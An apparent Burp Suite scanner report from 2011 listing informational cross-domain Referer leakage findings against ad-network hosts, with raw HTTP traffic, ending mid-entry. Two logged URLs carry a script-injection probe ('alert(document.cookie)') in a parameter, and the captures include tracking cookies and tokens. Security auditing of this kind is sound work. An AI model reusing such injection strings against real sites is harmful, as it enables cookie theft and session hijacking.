http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan
http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/
http://www.zvents.com/
http://xads.zedo.com/ads2/c

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

17.1. http://a.tribalfusion.com/j.ad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/j.ad

Issue detail

The page was loaded from a URL containing a query string:

http://a.tribalfusion.com/j.ad?site=nydailynewscom&adSpace=ros&tagKey=1282868635&th=24526296851&tKey=aVmn6ySVfC4AvEpWInUWZbPudZbi90&size=728x90&p=4068932&a=1&flashVer=10&ver=1.20&center=1&url=http%3A%2F%2Fwww.nydailynews.com%2Fblogs70f75'%253balert(document.cookie)%2F%2F84f766b9c15%2Fjets%2F2011%2F01%2Flive-chat-friday-noon-1&rurl=http%3A%2F%2Fburp%2Fshow%2F4&f=0&rnd=4069925

The response contains the following link to another domain:

http://www.googleadservices.com/pagead/conversion/1030456406/?label=UH3wCKK4ggIQ1oiu6wM&guid=ON&script=0

Request

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=apnbTgRkP6sAeCnr7aThQZcqPBHtrraZbSTRTZaxKPOHouZaJVIbQTSsBUPqmi4nEtfb83Zcvec3S8iUvCOxoTGpb74mTNHJQwaKvcNy6crTZaEDIyKsscnXKMV6dVS8Cjj39a44AW1RJsMFxcrNOalv5cGbdo53CJ3hSJeZbwgoZdoPQvB5XBWaxBldqc0yx46ZcRTwOnpIEM67ujH5rk8FCBUxUTVho7T8IJUMTYZd0TwwCm3rUsvAfXeyPY3GrFVTMo0OPnkPqLNfy7lucPe6JOaARob4cdJG8W6oycO0gCTFlhcLuNw9jFtSed6uw6r0tHISg1pRvsWAO7MY3Lr2uFxDUtZcyTAckJYAI3d3XPSQriZdEE06yPgwHHqlv652SvRZceLbX88lCpQEtnNoTnYu8efdTYcJkNCsd; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 14:14:39 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Expires: 0
Connection: keep-alive
Content-Length: 660

document.write('<IFRAME src="http://a.tribalfusion.com/p.media/aomN7ET6np2sJ1YUrITPip5Pn6QPrE4WMo1t3LpdEw56nW5cj8Tsn7WcfiPAFwTWMPWFjP3rAwVEUrTaBcPTBZdSsJZbRrEvRdMdUVM54FXuntqo0aqp2tMBSGjA4AnZaoWXqTd36
...[SNIP]...
<div style="display:inline;">\r\n<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1030456406/?label=UH3wCKK4ggIQ1oiu6wM&guid=ON&script=0"/>\r\n<\/div>
...[SNIP]...

17.2. http://a.tribalfusion.com/j.ad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/j.ad

Issue detail

The page was loaded from a URL containing a query string:

http://a.tribalfusion.com/j.ad?site=nydailynewscom&adSpace=ros&tagKey=1282868635&th=24526296851&tKey=aVmn6ySVfC4AvEpWInUWZbPudZbi90&size=728x90&p=4068932&a=1&flashVer=10&ver=1.20&center=1&url=http%3A%2F%2Fwww.nydailynews.com%2Fblogs70f75'%253balert(document.cookie)%2F%2F84f766b9c15%2Fjets%2F2011%2F01%2Flive-chat-friday-noon-1&rurl=http%3A%2F%2Fburp%2Fshow%2F4&f=0&rnd=4069925

The response contains the following link to another domain:

http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x2fe4f5.js&size_id=2&account_id=5804&site_id=7477&size=728x90

Request

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=a0nbTgS3n0mUyoxEnVmZbn8Rm35W8Y5Fm2k2ZcsaR08Za4ZbBhGtn71EFGYaX5OPFPctGjZdgytTV9Dr0SQo6nINrQawbopBBVPaeOWm8w3XYBWZdv4My8ulEZdRReTSnFtVdjXIRKWDGETnTpT3upPIurHNmT1E2TZboYBVsZdQJYyZcoZbeshZcPZbZdfJEn8Ukl4kedmuEL7AZbrTiQIjfnoY4pCFp0WWd6Glh6GZcGhIQHTE22B4hIpF1eeU5P5IJAaHjh0RDZdmYHtSt3LZbYR15gJZcxLBr5FOSnfyXr99fkqMsHtOh42DN0bovTZdVICDDWXaank49lADYKZdQtvWNlZbZaOgJB9pYo2JI3AfAKnI2MyWKY7jSvQvTdgmuxZbZa1LT8phZa3XHmJjHDmPobwF9sQL5tv570TJlH7pBwZdyb2; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:37:17 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Expires: 0
Connection: keep-alive
Content-Length: 263

document.write('<iframe src="http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x2fe4f5.js&size_id=2&account_id=5804&site_id=7477&size=728x90" width=728 height=90 marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0 scrolling=no><\/iframe>
...[SNIP]...

17.3. http://ad.afy11.net/ad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.afy11.net
Path:	/ad

Issue detail

The page was loaded from a URL containing a query string:

http://ad.afy11.net/ad?asId=1000004165407&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=86551686&rk1=26330496&rk2=1296251850.357&pt=0

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N3671.CentroNetwork/B5159652.2;abr=!ie4;abr=!ie5;sz=300x250;pc=[TPAS_ID];click=http://ad.afy11.net/ad?c=RhmTmvF0v0C6AZspIIWveWN0Im0fysTH31JY4UqlsUQ8lz18BCOULwciAi30lx5LMPzBmPTAaphQv7AZU9Kg52S6m38Ac8DgUfVTKS3d+ZM=!;ord=2803508621?
http://ad.doubleclick.net/adi/N3671.CentroNetwork/B5159652.2;sz=300x250;pc=[TPAS_ID];click=http://ad.afy11.net/ad?c=RhmTmvF0v0C6AZspIIWveWN0Im0fysTH31JY4UqlsUQ8lz18BCOULwciAi30lx5LMPzBmPTAaphQv7AZU9Kg52S6m38Ac8DgUfVTKS3d+ZM=!;ord=2803508621?
http://ad.doubleclick.net/adj/N3671.CentroNetwork/B5159652.2;abr=!ie;sz=300x250;pc=[TPAS_ID];click=http://ad.afy11.net/ad?c=RhmTmvF0v0C6AZspIIWveWN0Im0fysTH31JY4UqlsUQ8lz18BCOULwciAi30lx5LMPzBmPTAaphQv7AZU9Kg52S6m38Ac8DgUfVTKS3d+ZM=!;ord=2803508621?

Request

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache, must-revalidate
Server: AdifyServer
Content-Type: text/html; charset=utf-8
Content-Length: 1767
Set-Cookie: c=AQEEAAAAAACarxAA-hMpTQAAAAAAAAAAAAAAAAAAAAD1EylNAQABANG4BtXoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACzbLjU6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGXzrQE5fjdNAAAAAAAAAAAAAAAAAAAAAAN+N00CAAIAdaTl1OgAAADlRP3U6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAF+9sdToAAAAD7221OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkqJXAPN-N00AAAAAAAAAAAAAAAAAAAAAvn83TQEAAgARpOXU6AAAAHWk5dToAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX72x1OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAxZEByjtDTQAAAAAAAAAAAAAAAAAAAADUO0NNAQABAHVvC9XoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADfTrnU6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==; path=/; expires=Sat, 31-Dec-2019 00:00:00 GMT; domain=afy11.net;
P3P: policyref="http://ad.afy11.net/privacy.xml", CP=" NOI DSP NID ADMa DEVa PSAa PSDa OUR OTRa IND COM NAV STA OTC"

<script type="text/javascript" src="http://ad.afy11.net/sracl.js"></script>

<div style="width: 300px; height: 250px; border-width: 0px;">
<IFRAME SRC="http://ad.doubleclick.net/adi/N3671.CentroNetwork/B5159652.2;sz=300x250;pc=[TPAS_ID];click=http://ad.afy11.net/ad?c=RhmTmvF0v0C6AZspIIWveWN0Im0fysTH31JY4UqlsUQ8lz18BCOULwciAi30lx5LMPzBmPTAaphQv7AZU9Kg52S6m38Ac8DgUfVTKS3d+ZM=!;ord=2803508621?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N3671.CentroNetwork/B5159652.2;abr=!ie;sz=300x250;pc=[TPAS_ID];click=http://ad.afy11.net/ad?c=RhmTmvF0v0C6AZspIIWveWN0Im0fysTH31JY4UqlsUQ8lz18BCOULwciAi30lx5LMPzBmPTAaphQv7AZU9Kg52S6m38Ac8DgUfVTKS3d+ZM=!;ord=2803508621?">
</SCRIPT>
...[SNIP]...
TH31JY4UqlsUQ8lz18BCOULwciAi30lx5LMPzBmPTAaphQv7AZU9Kg52S6m38Ac8DgUfVTKS3d+ZM=!http://ad.doubleclick.net/jump/N3671.CentroNetwork/B5159652.2;abr=!ie4;abr=!ie5;sz=300x250;pc=[TPAS_ID];ord=2803508621?">
<IMG SRC="http://ad.doubleclick.net/ad/N3671.CentroNetwork/B5159652.2;abr=!ie4;abr=!ie5;sz=300x250;pc=[TPAS_ID];click=http://ad.afy11.net/ad?c=RhmTmvF0v0C6AZspIIWveWN0Im0fysTH31JY4UqlsUQ8lz18BCOULwciAi30lx5LMPzBmPTAaphQv7AZU9Kg52S6m38Ac8DgUfVTKS3d+ZM=!;ord=2803508621?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...

17.4. http://ad.afy11.net/ad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.afy11.net
Path:	/ad

Issue detail

The page was loaded from a URL containing a query string:

http://ad.afy11.net/ad?asId=1000004165407&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=38178276&rk1=15197426&rk2=1296251850.36&pt=0

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N3671.CentroNetwork/B5159652.2;abr=!ie4;abr=!ie5;sz=300x250;pc=[TPAS_ID];click=http://ad.afy11.net/ad?c=fynY-cEEjEyoo-jgd2DP245a7fJlfzaqIP7RGO1EN1pCMLXiZYn+lZl1GiONbajXgP8MZvoIMUmiqFAfe1Dh257IAF8HzcAk7HK6p+9cgEE=!;ord=2632647138?
http://ad.doubleclick.net/adi/N3671.CentroNetwork/B5159652.2;sz=300x250;pc=[TPAS_ID];click=http://ad.afy11.net/ad?c=fynY-cEEjEyoo-jgd2DP245a7fJlfzaqIP7RGO1EN1pCMLXiZYn+lZl1GiONbajXgP8MZvoIMUmiqFAfe1Dh257IAF8HzcAk7HK6p+9cgEE=!;ord=2632647138?
http://ad.doubleclick.net/adj/N3671.CentroNetwork/B5159652.2;abr=!ie;sz=300x250;pc=[TPAS_ID];click=http://ad.afy11.net/ad?c=fynY-cEEjEyoo-jgd2DP245a7fJlfzaqIP7RGO1EN1pCMLXiZYn+lZl1GiONbajXgP8MZvoIMUmiqFAfe1Dh257IAF8HzcAk7HK6p+9cgEE=!;ord=2632647138?

Request

GET /ad?asId=1000004165407&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=38178276&rk1=15197426&rk2=1296251850.36&pt=0 HTTP/1.1
Host: ad.afy11.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: a=AZ7s9B85IkyRNDgbVDU-vg; s=1,2*4d2913f5*YxNSVIeEeL*XkHked9a5WVEwm102ii7WMtfCA==*; c=AQEDAAAAAACarxAA-hMpTQAAAAAAAAAAAAAAAAAAAAD1EylNAQABANG4BtXoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACzbLjU6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGXzrQE5fjdNAAAAAAAAAAAAAAAAAAAAAAN+N00CAAIAdaTl1OgAAADlRP3U6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAF+9sdToAAAAD7221OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkqJXAPN-N00AAAAAAAAAAAAAAAAAAAAAvn83TQEAAgARpOXU6AAAAHWk5dToAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX72x1OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=; f=AgECAAAAAAALqJELwX83TQyokQsDfjdN

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache, must-revalidate
Server: AdifyServer
Content-Type: text/html; charset=utf-8
Content-Length: 1767
Set-Cookie: c=AQEEAAAAAACarxAA-hMpTQAAAAAAAAAAAAAAAAAAAAD1EylNAQABANG4BtXoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACzbLjU6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGXzrQE5fjdNAAAAAAAAAAAAAAAAAAAAAAN+N00CAAIAdaTl1OgAAADlRP3U6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAF+9sdToAAAAD7221OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkqJXAPN-N00AAAAAAAAAAAAAAAAAAAAAvn83TQEAAgARpOXU6AAAAHWk5dToAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX72x1OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADy5OcAyjtDTQAAAAAAAAAAAAAAAAAAAABbc0NNAQABAHVvC9XoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADfTrnU6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==; path=/; expires=Sat, 31-Dec-2019 00:00:00 GMT; domain=afy11.net;
P3P: policyref="http://ad.afy11.net/privacy.xml", CP=" NOI DSP NID ADMa DEVa PSAa PSDa OUR OTRa IND COM NAV STA OTC"

<script type="text/javascript" src="http://ad.afy11.net/sracl.js"></script>

<div style="width: 300px; height: 250px; border-width: 0px;">
<IFRAME SRC="http://ad.doubleclick.net/adi/N3671.CentroNetwork/B5159652.2;sz=300x250;pc=[TPAS_ID];click=http://ad.afy11.net/ad?c=fynY-cEEjEyoo-jgd2DP245a7fJlfzaqIP7RGO1EN1pCMLXiZYn+lZl1GiONbajXgP8MZvoIMUmiqFAfe1Dh257IAF8HzcAk7HK6p+9cgEE=!;ord=2632647138?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N3671.CentroNetwork/B5159652.2;abr=!ie;sz=300x250;pc=[TPAS_ID];click=http://ad.afy11.net/ad?c=fynY-cEEjEyoo-jgd2DP245a7fJlfzaqIP7RGO1EN1pCMLXiZYn+lZl1GiONbajXgP8MZvoIMUmiqFAfe1Dh257IAF8HzcAk7HK6p+9cgEE=!;ord=2632647138?">
</SCRIPT>
...[SNIP]...
aqIP7RGO1EN1pCMLXiZYn+lZl1GiONbajXgP8MZvoIMUmiqFAfe1Dh257IAF8HzcAk7HK6p+9cgEE=!http://ad.doubleclick.net/jump/N3671.CentroNetwork/B5159652.2;abr=!ie4;abr=!ie5;sz=300x250;pc=[TPAS_ID];ord=2632647138?">
<IMG SRC="http://ad.doubleclick.net/ad/N3671.CentroNetwork/B5159652.2;abr=!ie4;abr=!ie5;sz=300x250;pc=[TPAS_ID];click=http://ad.afy11.net/ad?c=fynY-cEEjEyoo-jgd2DP245a7fJlfzaqIP7RGO1EN1pCMLXiZYn+lZl1GiONbajXgP8MZvoIMUmiqFAfe1Dh257IAF8HzcAk7HK6p+9cgEE=!;ord=2632647138?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...

17.5. http://ad.afy11.net/ad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.afy11.net
Path:	/ad

Issue detail

The page was loaded from a URL containing a query string:

http://ad.afy11.net/ad?asId=1000004165407&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=38178276&rk1=15197426&rk2=1296251850.36&pt=0

The response contains the following link to another domain:

http://d3.zedo.com/jsc/d3/fo.js

Request

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache, must-revalidate
Server: AdifyServer
Content-Type: text/html; charset=utf-8
Content-Length: 750
P3P: policyref="http://ad.afy11.net/privacy.xml", CP=" NOI DSP NID ADMa DEVa PSAa PSDa OUR OTRa IND COM NAV STA OTC"

<script type="text/javascript" src="http://ad.afy11.net/sracl.js"></script>

<div style="width: 300px; height: 250px; border-width: 0px;"><script language="JavaScript"> var zflag_nid="951"; var zfl
...[SNIP]...
</script> <script language="JavaScript" src="http://d3.zedo.com/jsc/d3/fo.js"></script>
...[SNIP]...

17.6. http://ad.doubleclick.net/adi/N3093.130430.MINDSETMEDIA/B4053191 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3093.130430.MINDSETMEDIA/B4053191

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N3093.130430.MINDSETMEDIA/B4053191;sz=300x250;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9d/3/0/%2a/c%3B234739680%3B0-0%3B0%3B58581955%3B4307-300/250%3B39068367/39086124/1%3Bu%3D%2Cuol-70184290_1296254387%2C11d765b6a10b1b3%2Cent%2Cmm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_l-cm.sports_h-cm.%3B~sscs%3D%3f;ord=1656403?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/2376169/Jan+11+Transition+300x250+Lorenzo.jpg

Request

GET /adi/N3093.130430.MINDSETMEDIA/B4053191;sz=300x250;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9d/3/0/%2a/c%3B234739680%3B0-0%3B0%3B58581955%3B4307-300/250%3B39068367/39086124/1%3Bu%3D%2Cuol-70184290_1296254387%2C11d765b6a10b1b3%2Cent%2Cmm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_l-cm.sports_h-cm.%3B~sscs%3D%3f;ord=1656403? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Fri, 28 Jan 2011 22:39:48 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 1143

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a9d/4/197/%2a/
...[SNIP]...
t1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_l-cm.sports_h-cm.%3B~sscs%3D%3fhttp://www.colehaan.com/colehaan/home.jsp?cp=mindset&csdartid=40167839_55761652"><img src="http://s0.2mdn.net/viewad/2376169/Jan+11+Transition+300x250+Lorenzo.jpg" border=0 alt="Advertisement"></a>
...[SNIP]...

17.7. http://ad.doubleclick.net/adi/N3093.130430.MINDSETMEDIA/B4053191 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3093.130430.MINDSETMEDIA/B4053191

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N3093.130430.MINDSETMEDIA/B4053191;sz=300x250;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9d/3/0/%2a/c%3B234739680%3B0-0%3B0%3B58581955%3B4307-300/250%3B39068367/39086124/1%3Bu%3D%2Cuol-70184290_1296254387%2C11d765b6a10b1b3%2Cent%2Cmm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_l-cm.sports_h-cm.%3B%7Esscs%3D%3f;ord=1656403?\

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/2376169/Jan+11+Transition+300x250+Stephanie.jpg

Request

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1147
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:19:51 GMT
Expires: Sat, 29 Jan 2011 05:19:51 GMT
Connection: close

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a9e/4/199/%2a/
...[SNIP]...
-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_l-cm.sports_h-cm.%3B%7Esscs%3D%3fhttp://www.colehaan.com/colehaan/home.jsp?cp=mindset&csdartid=40167838_55761652"><img src="http://s0.2mdn.net/viewad/2376169/Jan+11+Transition+300x250+Stephanie.jpg" border=0 alt="Advertisement"></a>
...[SNIP]...

17.8. http://ad.doubleclick.net/adi/N3671.CentroNetwork/B5159652.2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3671.CentroNetwork/B5159652.2

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N3671.CentroNetwork/B5159652.2;sz=300x250;pc=[TPAS_ID];click=http://ad.afy11.net/ad?c=RhmTmvF0v0C6AZspIIWveWN0Im0fysTH31JY4UqlsUQ8lz18BCOULwciAi30lx5LMPzBmPTAaphQv7AZU9Kg52S6m38Ac8DgUfVTKS3d+ZM=!;ord=2803508621?

The response contains the following links to other domains:

http://s0.2mdn.net/879366/flashwrite_1_2.js
http://s0.2mdn.net/998766/0328_300x250_Winter_Largest4GNetwork_DataPlan_Static.jpg

Request

GET /adi/N3671.CentroNetwork/B5159652.2;sz=300x250;pc=[TPAS_ID];click=http://ad.afy11.net/ad?c=RhmTmvF0v0C6AZspIIWveWN0Im0fysTH31JY4UqlsUQ8lz18BCOULwciAi30lx5LMPzBmPTAaphQv7AZU9Kg52S6m38Ac8DgUfVTKS3d+ZM=!;ord=2803508621? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000004165407&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=86551686&rk1=26330496&rk2=1296251850.357&pt=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Fri, 28 Jan 2011 21:57:41 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6328

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
4UqlsUQ8lz18BCOULwciAi30lx5LMPzBmPTAaphQv7AZU9Kg52S6m38Ac8DgUfVTKS3d+ZM=!http%3a%2f%2ft-mobile-coverage.t-mobile.com/4G-Network-Coverage%3Fcm_mmc_o%3DKbl5kzYCjC-czywEwllCjCWwfcByLCjC8bEfwy%25208bEpBc"><img src="http://s0.2mdn.net/998766/0328_300x250_Winter_Largest4GNetwork_DataPlan_Static.jpg" width="300" height="250" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...

17.9. http://ad.doubleclick.net/adi/N3740.270604.B3/B5112048 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3740.270604.B3/B5112048

Issue detail

The page was loaded from a URL containing a query string:

